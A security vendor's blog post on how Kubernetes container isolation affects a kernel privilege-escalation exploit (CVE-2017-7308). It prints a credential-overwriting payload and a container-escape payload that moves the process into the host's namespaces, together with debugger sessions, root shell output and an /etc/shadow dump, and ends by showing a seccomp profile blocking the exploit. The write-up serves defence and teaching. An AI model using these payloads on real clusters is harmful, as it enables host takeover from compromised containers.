
Kernel privilege escalation: how Kubernetes container isolation impacts privilege escalation attacks

Written by:
Kamil Potrec

December 3, 2020

During the day, I spend my time analyzing Terraform code, Kubernetes object configuration files, and identifying common security issues. When the sun sets, I put on my hoodie, fire up Linux VMs and debuggers to look under the hood of technologies that make up the cloud native ecosystem.

In this post, we will explore how Kubernetes container isolation impacts privilege escalation attacks. We will use common kernel exploitation techniques to figure out how container abstraction layers can hinder our path to that precious root shell.

What is privilege escalation?

Privilege escalation is a term used to describe the process of obtaining more permissions to a resource. Kernel privilege escalation is a process of obtaining these permissions by exploiting a weakness in one of many kernel entry points, also referred to as attack vectors. An attack vector is simply a path which provides access to the vulnerable code.

We interact with the kernel in many ways: by reading from the file system, opening a device file, issuing system calls, or sending a packet over the network interface. All of these actions require some processing in kernel space. When the kernel performs an action on behalf of a user process, we say that the kernel operates in process context. Each process is represented in the kernel by a struct task_struct. These structures are stored in a circular doubly linked list, and on the x86-64 architecture the current one is accessed through per-CPU variables when a context switch happens from user space to kernel space.

A task_struct contains a pointer to a struct cred, which holds the user identifiers and capabilities associated with the process. This information is used by the kernel to determine if an action can be performed by the process, for example, if it is allowed to execute a specific syscall. The generic goal of the kernel privilege escalation process is to replace or update the credentials structure to gain more permissions.

How does privilege escalation work?

The most common technique to obtain elevated permissions in kernel space is to use the combination of kernel functions [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437)([prepare_kernel_cred(0)](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682)). This can only be achieved once an exploit has obtained control over the instruction pointer (RIP) and successfully defeated memory access and randomization controls. [prepare_kernel_cred](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682) can generate the credentials object based on an existing one, or more generously generate a default one with full root permissions. [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437) simply updates the task_struct of the current process with the new credentials object.

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

void get_root_payload(void) {
   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
   );
}

Kernel exploitation is a very large field, and so for this blog post, we will just explore an oversimplified version of kernel privilege escalation. There are numerous security controls in the kernel which are designed to make exploitation harder. SMEP, SMAP, KASLR, and KPTI are all mechanisms which are implemented in hardware or in the kernel and are turned on or off by the distribution you are using, or by a system administrator. There is no direct way to control these settings from Kubernetes and these are, therefore, out of scope for this post.

We will be using an old issue in the af_packet implementation that was assigned CVE-2017-7308. The vulnerability is exploitable with the CAP_NET_RAW capability, as it requires access to raw sockets. Details of the vulnerability are exhaustively explained here, so we won’t go into them. We can obtain all the capabilities we need in an unprivileged user namespace. On the Ubuntu distribution, access to user namespaces is not restricted by default.

dev@node1:~/exploit$ grep CONFIG_USER_NS /boot/config-4.15.0-122-generic
CONFIG_USER_NS=y
dev@node1:~/exploit$ sudo sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1
dev@node1:~/exploit$

Let’s dig in

First off, let's look at the end-to-end process in a non-containerized environment.

We need to connect the GNU Debugger (gdb) to the virtual machine's gdb stub. Once the debugger is attached, we can set a breakpoint at a convenient location. In this case, we are using the mlock system call, which we can manually trigger from the exploit whenever we want to look at the internal state of the running process. Note that gdb will only break if the executing process is named “exploit”. This minimizes the risk of the breakpoint being triggered by some other process on the system. The setup tasks are conveniently scripted in a .gdb command file. We execute gdb with the -x flag to perform the setup in a consistent and repeatable way.

dev@pwnbox:/$ cat setup.gdb
set print pretty on
file vmlinux
target remote 127.0.0.1:11234
break sys_mlock if $_streq($lx_current().comm, "exploit")
continue
dev@pwnbox:/$ gdb -q -x setup.gdb
0xffffffff819c24be in native_safe_halt () at ./arch/x86/include/asm/irqflags.h:61
61  }
Breakpoint 1 at 0xffffffff8121da50: file mm/mlock.c, line 709.

Breakpoints will be triggered before the unprivileged user namespace is created, just before we trigger the vulnerability, and after we have obtained root credentials. We implement this behavior by simply issuing the mlock syscall (number 149 on x86-64) at each of these points.

syscall(149, 0, 0); // Break before CLONE_NEWUSER
if (unshare(CLONE_NEWUSER) != 0) {
   perror("[-] unshare(CLONE_NEWUSER)");
   exit(EXIT_FAILURE);
}
/* OMITTED */
printf("[*] executing get root payload %p\n", &get_root_payload);
syscall(149, 0, 0); // Break before commit_creds
exploit_cve_2017_7308((void *)&get_root_payload);
printf("[*] done\n");
syscall(149, 0, 0); // Break after commit_creds

Now we can execute the exploit:

dev@node1:~/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x558abc4dd583

Our first breakpoint is triggered as expected. We can examine the cred structure using the gdb helper function $lx_current. The effective UID of the current process is 1000 and, as expected, it has no effective capabilities in the current namespace.

Thread 6 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$1 = {
 usage = {counter = 4},
 uid = { val = 1000 },
 gid = { val = 1000 },
 suid = { val = 1000 },
 sgid = { val = 1000 },
 euid = { val = 1000 },
 egid = { val = 1000 },
 fsuid = { val = 1000 },
 fsgid = { val = 1000 },
 securebits = 0,
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {0, 0} },
 cap_effective = { cap = {0, 0} },
 cap_bset = { cap = {4294967295, 63} },
 cap_ambient = { cap = {0, 0} },
 jit_keyring = 0 '\000',
 session_keyring = 0xffff888331051f00,
 process_keyring = 0x0 <irq_stack_union>,
 thread_keyring = 0x0 <irq_stack_union>,
 request_key_auth = 0x0 <irq_stack_union>,
 security = 0xffff8882bb29dd60,
 user = 0xffff88832dd89f00,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 group_info = 0xffff8882b9181480,
 {
   non_rcu = 0,
   rcu = {
     next = 0x0 <irq_stack_union>,
     func = 0x0 <irq_stack_union>
   }
 }
}
(gdb)

The second breakpoint is triggered after a call to unshare, and the new user namespace is created for the process. Observe how the UID remains unchanged, but cap_effective and user_ns attributes have changed. Capabilities are stored as a bitmask, which is more readable in hex format.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$2 = {
 /* OMITTED */
 uid = { val = 1000 },
 gid = { val = 1000 },
 /* OMITTED */
 euid = { val = 1000 },
 /* OMITTED */
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {4294967295, 63} },
 cap_effective = { cap = {4294967295, 63} },
 /* OMITTED */
 user = 0xffff88832dd89f00,
 user_ns = 0xffff8882c1e0b800,
 /* OMITTED */
}
(gdb) p/x 4294967295
$4 = 0xffffffff 
(gdb)

Our last breakpoint is triggered after the vulnerability is exploited. Observe that UID is now set to 0, and user namespace is reset to init_user_ns which represents the host’s init user namespace.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$3 = {
 /* OMITTED */
 uid = { val = 0 },
 /* OMITTED */
 euid = { val = 0 },
 /* OMITTED */
 cap_effective = { cap = {4294967295, 63} },
 /* OMITTED */
 user = 0xffffffff82454160 <root_user>,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 group_info = 0xffffffff8245b568 <init_groups>,
 /* OMITTED */
}

Our shell returns and we now have full root permissions on the host.

dev@node1:~/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x558abc4dd583
[*] done
[+] got r00t
root@node1:/home/dev/exploit# id
uid=0(root) gid=0(root) groups=0(root)
root@node1:/home/dev/exploit#

Kernel exploit in a container

Next, we will try to execute the very same exploit inside a pod. We have created a very simple pod object definition and deployed it into the cluster.

apiVersion: v1
kind: Pod
metadata:
 name: very-default-pod
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     command: [ "sleep", "infinity" ]

Let's see what happens in the default configuration.

dev@pwnbox:/$ kubectl get nodes
NAME    STATUS   ROLES    AGE   VERSION
node1   Ready    master   8d    v1.18.10
dev@pwnbox:/$ kubectl get pods
No resources found in default namespace.
dev@pwnbox:/$ kubectl apply -f very-default-pod.yaml
pod/test created
dev@pwnbox:/$ kubectl get pods
NAME   READY   STATUS    RESTARTS   AGE
test   1/1     Running   0          4s
dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
root@test:~# id
uid=0(root) gid=0(root) groups=0(root)

Root by default

The image that we used in the demo does not specify an unprivileged user, and by default, Kubernetes will not enforce the UID. So, it appears that we have root access without needing to exploit the kernel. We re-run the very same exploit and break in the kernel just before it executes the vulnerable path. If you look at the effective capabilities of the process, it’s clear that some are missing. The value is set to 2818844155 (0xa80425fb), which represents the default capability set granted by the Docker runtime.

(gdb) p *($lx_current().cred)
$1 = {
 /* OMITTED */
 euid = { val = 0 },
 /* OMITTED */
 securebits = 0,
 cap_inheritable = { cap = {2818844155, 0} },
 cap_permitted = { cap = {2818844155, 0} },
 cap_effective = { cap = {2818844155, 0} },
 cap_bset = { cap = {2818844155, 0} },
 cap_ambient = { cap = {0, 0} },
 /* OMITTED */
 user = 0xffffffff82454160 <root_user>,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 /* OMITTED */
}

After the exploit completes, the effective set once again includes all of the capabilities.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$2 = {
 /* OMITTED */
 securebits = 0,
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {4294967295, 63} },
 cap_effective = { cap = {4294967295, 63} },
 cap_bset = { cap = {4294967295, 63} },
 /* OMITTED */
}

This time we will enforce a non-root user ID on the container by setting the runAsUser and runAsGroup security context attributes.

apiVersion: v1
kind: Pod
metadata:
 name: non-root-pod
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     securityContext:
       runAsUser: 1000
       runAsGroup: 1000
     command: [ "sleep", "infinity" ]

This time we don’t have root permissions out of the box. The exploit, however, performs identically, with one major difference in the final result: it appears that we have all the permissions, but we don’t see everything on the system.

dev@pwnbox:/$ kubectl apply -f non-root-uid-pod.yaml
pod/test created
dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
groups: cannot find name for group ID 1000
I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x55e55ff5a583
[*] done
[+] got r00t
root@test:/mnt/dev/exploit# id
uid=0(root) gid=0(root) groups=0(root)
root@test:/mnt/dev/exploit# cat /etc/shadow
root:*:18198:0:99999:7:::
daemon:*:18198:0:99999:7:::
bin:*:18198:0:99999:7:::
sys:*:18198:0:99999:7:::
sync:*:18198:0:99999:7:::
games:*:18198:0:99999:7:::
man:*:18198:0:99999:7:::
lp:*:18198:0:99999:7:::
mail:*:18198:0:99999:7:::
news:*:18198:0:99999:7:::
uucp:*:18198:0:99999:7:::
proxy:*:18198:0:99999:7:::
www-data:*:18198:0:99999:7:::
backup:*:18198:0:99999:7:::
list:*:18198:0:99999:7:::
irc:*:18198:0:99999:7:::
gnats:*:18198:0:99999:7:::
nobody:*:18198:0:99999:7:::
_apt:*:18198:0:99999:7:::
messagebus:*:18207:0:99999:7:::
root@test:/mnt/dev/exploit# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
   inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
   inet6 ::1/128 scope host
      valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
   link/ipip 0.0.0.0 brd 0.0.0.0
root@test:/mnt/dev/exploit#

Namespace cage

We managed to get all the capabilities and the root UID, but we only bypassed the capabilities barrier of the container. We still don’t have access to the host's filesystem, and we cannot see all the processes or even communicate over the host’s network interfaces.

root@test:~# ls -la /dev/
total 4
drwxr-xr-x 5 root root  360 Nov 23 14:04 .
drwxr-xr-x 1 root root 4096 Nov 23 14:04 ..
lrwxrwxrwx 1 root root   11 Nov 23 14:04 core -> /proc/kcore
lrwxrwxrwx 1 root root   13 Nov 23 14:04 fd -> /proc/self/fd
crw-rw-rw- 1 root root 1, 7 Nov 23 14:04 full
drwxrwxrwt 2 root root   40 Nov 23 14:04 mqueue
crw-rw-rw- 1 root root 1, 3 Nov 23 14:04 null
lrwxrwxrwx 1 root root    8 Nov 23 14:04 ptmx -> pts/ptmx
drwxr-xr-x 2 root root    0 Nov 23 14:04 pts
crw-rw-rw- 1 root root 1, 8 Nov 23 14:04 random
drwxrwxrwt 2 root root   40 Nov 23 14:04 shm
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stderr -> /proc/self/fd/2
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdin -> /proc/self/fd/0
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdout -> /proc/self/fd/1
-rw-rw-rw- 1 root root    0 Nov 23 14:04 termination-log
crw-rw-rw- 1 root root 5, 0 Nov 23 14:04 tty
crw-rw-rw- 1 root root 1, 9 Nov 23 14:04 urandom
crw-rw-rw- 1 root root 1, 5 Nov 23 14:04 zero
root@test:~# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4532   752 ?        Ss   14:04   0:00 sleep infinity
root         7  0.0  0.0  18504  3352 pts/0    Ss   14:04   0:00 /bin/bash
root        24  0.0  0.0  34400  2776 pts/0    R+   14:04   0:00 ps aux
root@test:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
   inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
   link/ipip 0.0.0.0 brd 0.0.0.0
4: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
   link/ether 4e:52:2c:19:28:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
   inet 10.233.90.139/32 scope global eth0
      valid_lft forever preferred_lft forever
root@test:~#

At this point, we can load any kernel module we like, but that is noisy and will trigger even the most basic intrusion detection systems (one would hope). To test that we have the required permissions, we will remove an unused module. Note that your Docker image needs to have the module tools installed. In the case of Debian images, you will need to install the kmod package.

root@test:/mnt/dev/exploit# lsmod
Module                  Size  Used by
i2c_piix4              24576  0
binfmt_misc            20480  1
xt_CT                  16384  8
xt_tcpudp              16384  12
/* OMITTED */
pata_acpi              16384  0
floppy                 77824  0
root@test:/mnt/dev/exploit# rmmod i2c_piix4
root@test:/mnt/dev/exploit# lsmod | grep i2c
root@test:/mnt/dev/exploit#

Instead, we can extend our kernel exploit and set the [struct nsproxy](https://github.com/torvalds/linux/blob/master/include/linux/nsproxy.h#L31) object in the current context to point to the namespaces we like. Namespaces are identified by inodes, but the kernel exports the address of [init_nsproxy](https://github.com/torvalds/linux/blob/master/kernel/nsproxy.c#L32), which we can use to copy the host’s init namespaces to our container.

(gdb) info address init_nsproxy
Symbol "init_nsproxy" is static storage at address 0xffffffff8245b2a0.
(gdb)

The sys_setns syscall can be used to update the namespaces of the process context. There are three primary namespaces we want to escalate into: PID, network, and mount. First, we need to obtain a reference to the root namespaces, which we can do by moving the container's PID 1 into the host’s namespaces. Then we can get references to any of those namespaces from the /proc file system entries of PID 1. Finally, we move the current process into the required namespaces.

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
typedef unsigned long long __attribute__((regparm(3))) (* _find_task_by_vpid)(unsigned int vnr);
typedef void __attribute__((regparm(3))) (* _switch_task_namespaces)(void *tsk, void *new);
typedef long __attribute__((regparm(4))) (* _do_sys_open)(int fd, const char *filename, int flags, unsigned short mode);
typedef long __attribute__((regparm(3))) (* _sys_setns)(int fd, int nstype);

void get_root_payload(void) {
   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
   );
   // [1] - Identify PID 1 task in current PID namespace
   unsigned long long task = ((_find_task_by_vpid)(KERNEL_BASE + FIND_TASK_BY_VPID))(1);
   // [2] - Move PID 1 into init namespaces
   ((_switch_task_namespaces)(KERNEL_BASE + SWITCH_TASK_NS))((void *)task, (void *)(KERNEL_BASE + INIT_NSPROXY));
   // [3] - Read mount namespace inode
   long fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
   // [4] - Move current process into host’s mount namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
   // [5] - Read pid namespace inode
   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
   // [6] - Move current process into host’s pid namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
   // [7] - Read network namespace inode
   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/net", O_RDONLY, 0);
   // [8] - Move current process into host’s network namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
}

After our exploit is executed, we can access all of the interesting system resources.

I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ id
uid=1000 gid=1000 groups=1000
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x559f462d7583
[*] done
[+] got r00t
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)
root@test:/# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.0 226012  9556 ?        Ss   14:30   0:02 /sbin/init nokaslr nopti
root         2  0.0  0.0      0     0 ?        S    14:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I    14:30   0:00 [kworker/0:0]
root         4  0.0  0.0      0     0 ?        I<   14:30   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   14:30   0:00 [mm_percpu_wq]
/* OMITTED */
dev      18468  0.0  0.0   4532   724 ?        Ss   14:44   0:00 sleep infinity
dev      18642  0.0  0.0  18508  3360 pts/0    Ss   14:44   0:00 /bin/bash
root     19762  0.2  0.0   4516   752 pts/0    S    14:45   0:00 ./exploit
root     19767  0.0  0.0  18516  3412 pts/0    S    14:45   0:00 /bin/bash -i
root     19803  0.0  0.0  36708  3172 pts/0    R+   14:45   0:00 ps aux
root@test:/# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
   link/ether 52:54:00:8a:6e:73 brd ff:ff:ff:ff:ff:ff
   inet 10.100.100.80/24 brd 10.100.100.255 scope global dynamic ens3
      valid_lft 2704sec preferred_lft 2704sec
   inet6 fe80::5054:ff:fe8a:6e73/64 scope link
      valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
   link/ether 02:42:00:d6:f9:0a brd ff:ff:ff:ff:ff:ff
   inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
      valid_lft forever preferred_lft forever
4: kube-ipvs0: <BROADCAST,NOARP> mtu 1500 qdisc noop state DOWN group default
   link/ether 76:17:6a:aa:ea:9e brd ff:ff:ff:ff:ff:ff
   inet 10.233.59.218/32 brd 10.233.59.218 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.0.1/32 brd 10.233.0.1 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.0.3/32 brd 10.233.0.3 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.17.50/32 brd 10.233.17.50 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
/* OMITTED */
14: cali1037a54e65e@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
   link/ether ee:ee:ee:ee:ee:ee brd ff:ff:ff:ff:ff:ff link-netnsid 0
   inet6 fe80::ecee:eeff:feee:eeee/64 scope link
      valid_lft forever preferred_lft forever
root@test:/#
root@test:/# reboot
Failed to connect to bus: No data available

Usability of capabilities

The default capabilities assigned to Kubernetes containers (with the Docker runtime) grant CAP_NET_RAW to the container. Does this mean we would be able to exploit the vulnerability even if unprivileged user namespaces are disabled? We added code to set the effective capabilities required to reach the vulnerable code.

/* Snapshot the capability sets of the current process (libcap) */
cap_t caps = cap_get_proc();
if (caps == NULL) {
   perror("[-] Failed to get current caps");
   exit(EXIT_FAILURE);
}
/* Request CAP_NET_RAW in the effective set */
cap_value_t cap_list[1] = { CAP_NET_RAW };
if (cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET) == -1) {
   perror("[-] Failed to set effective caps");
   exit(EXIT_FAILURE);
}
/* Apply the modified sets to the current process */
if (cap_set_proc(caps) != 0) {
   perror("[-] Failed to set process caps");
   exit(EXIT_FAILURE);
}
cap_free(caps);

As you can see, the exploit fails. But why?

I have no name!@test:/root$ id
uid=1000 gid=1000 groups=1000
I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[-] unshare(CLONE_NEWUSER): Operation not permitted
I have no name!@test:/mnt/dev/exploit$

This has to do with inheritable capabilities and how they are implemented. Even though the container runtime has granted these capabilities to the processes in the container, they have to be explicitly set as effective via sys_capset, and a process can only raise capabilities that are already in its permitted set. In practice, only processes running with UID 0 end up being able to set effective capabilities. So, if you want to run as a non-root user but still have access to some of the capabilities, you need to include a suid binary in your container to set the effective capabilities. Alternatively, you can simply set the required capabilities on the executable and drop the container capabilities. File capabilities are limited to file systems with extended attributes.

Seccomp to the rescue

Let’s now talk about attack vector reachability. Our exploit works because unprivileged users can obtain the CAP_NET_RAW capability in unprivileged user namespaces. We saw how this impacts our exploit in the above discussion about capabilities. There is one more countermeasure we can use to stop this attack, and yes, you can enable it via Kubernetes.

Seccomp is a mechanism that reduces the kernel's attack surface by filtering system calls. Unfortunately, by default, Kubernetes will not apply a seccomp profile to your container. This means that all system calls are allowed, subject to the permission checks already discussed. We can change that by adding an annotation to the object declaration (pre-v1.19), or by setting the seccompProfile field in the pod security context (v1.19 and later).

apiVersion: v1
kind: Pod
metadata:
 name: seccomp-pod
 annotations:
   seccomp.security.alpha.kubernetes.io/pod: runtime/default
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     command: [ "sleep", "infinity" ]

Let's have a look at how the default profile provided by the container runtime (in this case Docker) affects our exploit. We are greeted with an “Operation not permitted” error, because the default seccomp profile does not allow the unshare syscall.

I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[-] unshare(CLONE_NEWUSER): Operation not permitted
I have no name!@test:/mnt/dev/exploit$

Seccomp is great at limiting unnecessary kernel entry points. System calls such as unshare or userfaultfd can be safely disabled for most use cases, and blocking them stops some exploitation techniques. But there are some calls that would be tricky to block, such as waitid. You can find these and more techniques to exploit containers here.

Conclusions

We managed to prevent this exploit with a default seccomp profile. As you can see, even though our operating system is vulnerable, the exploit path is unreachable from our container (on this occasion). This technique could give you enough breathing room to plan the very much needed update to the operating system! You should consider these measures as defense-in-depth controls and mitigation strategies.

Always patch your systems! Snyk Infrastructure as Code can help you catch these mitigation options early on in your CI/CD pipeline, way before anything is deployed in production. We use adversarial techniques to identify high-impact security options in Kubernetes and cloud service providers. Use Snyk for free by registering for a free account.
